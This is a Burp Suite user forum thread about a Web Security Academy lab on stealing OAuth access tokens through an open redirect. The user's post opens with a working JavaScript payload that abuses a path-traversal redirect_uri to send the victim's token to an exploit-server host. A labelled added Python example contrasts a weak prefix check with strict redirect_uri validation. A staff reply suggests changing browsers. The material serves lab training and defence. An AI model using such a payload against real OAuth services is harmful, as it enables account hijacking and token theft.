Burp Suite User Forum


Stealing OAuth access tokens via an open redirect

nejigenius | Last updated: Jun 27, 2024 07:38AM UTC

<script> if (!document.location.hash) { window.location = 'https://oauth-0a3100f70481e50880c679a0027c0040.oauth-server.net/auth?client_id=pwfawrjz6wozrblc7kiwn&redirect_uri=https://0a4300a6044ae536804b7bbb00110027.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0ac400bb0458e5e980b57a22015a00dd.exploit-server.net/exploit/&response_type=token&nonce=-1360471060&scope=openid%20profile%20email' } else { window.location = '/?'+document.location.hash.substr(1) } </script>

I've been struggling with a couple of lab exercises. In one of them, I've got a payload that seems to work fine when I use the "View exploit" option. But when I try to actually deliver it by clicking "Deliver", nothing happens. I've checked the logs, and I don't see any IP addresses showing up except my own. I'm having a similar issue with another lab called "OAuth account hijacking via redirect_uri". For the past two days, I just can't get the payload to deliver to the victim's system. I've tried troubleshooting by resetting the labs, waiting for about 20-30 minutes, and then starting them up again. But so far, nothing's worked. I'm really not sure what I'm doing wrong here, and it's pretty frustrating. Any ideas on what might be causing this or how I can fix it?
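
The redirect_uri in the payload above only gets past the authorization server because it is checked as a prefix: the registered callback is followed by `/../post/next?path=...`, which the browser resolves to the site's open redirect. The following is an added example (not code from this thread, the lab, or PortSwigger) showing a prefix check next to a strict check that normalizes dot segments and demands an exact match; the hostnames are constructed stand-ins for the lab's random ones.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Constructed registered callback; the lab uses a long random host label.
REGISTERED_REDIRECT = "https://client.example/oauth-callback"


def prefix_check(redirect_uri: str) -> bool:
    """Weak validation: accepts any URI that merely starts with the registered one."""
    return redirect_uri.startswith(REGISTERED_REDIRECT)


def strict_check(redirect_uri: str) -> bool:
    """Hardened validation for a pre-registered redirect_uri.

    Requires the same scheme and host:port, collapses '.' and '..' segments
    (after percent-decoding, so '%2e%2e' is treated like '..'), compares the
    resulting path exactly, and rejects any query string or fragment.
    """
    candidate = urlsplit(redirect_uri)
    registered = urlsplit(REGISTERED_REDIRECT)

    if candidate.scheme.lower() != registered.scheme.lower():
        return False
    if candidate.netloc.lower() != registered.netloc.lower():
        return False
    if candidate.query or candidate.fragment:
        return False

    # posixpath.normpath turns "/oauth-callback/../post/next" into "/post/next",
    # so a traversal can no longer pass as "the callback path plus extra bits".
    candidate_path = posixpath.normpath(unquote(candidate.path) or "/")
    registered_path = posixpath.normpath(registered.path or "/")
    return candidate_path == registered_path


if __name__ == "__main__":
    # Constructed sample mirroring the shape of the payload in the post.
    traversal = ("https://client.example/oauth-callback/../post/next"
                 "?path=https://attacker.example/")
    print("prefix_check:", prefix_check(traversal))   # True  (accepted)
    print("strict_check:", strict_check(traversal))   # False (rejected)
```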

Ben, PortSwigger Agent | Last updated: Jun 27, 2024 07:59AM UTC

Hi, which browser are you using when you attempt this particular lab? If you use a standard version of Chrome (rather than the embedded browser), does this allow you to successfully deliver the exploit and retrieve the token from the victim user in the logs?
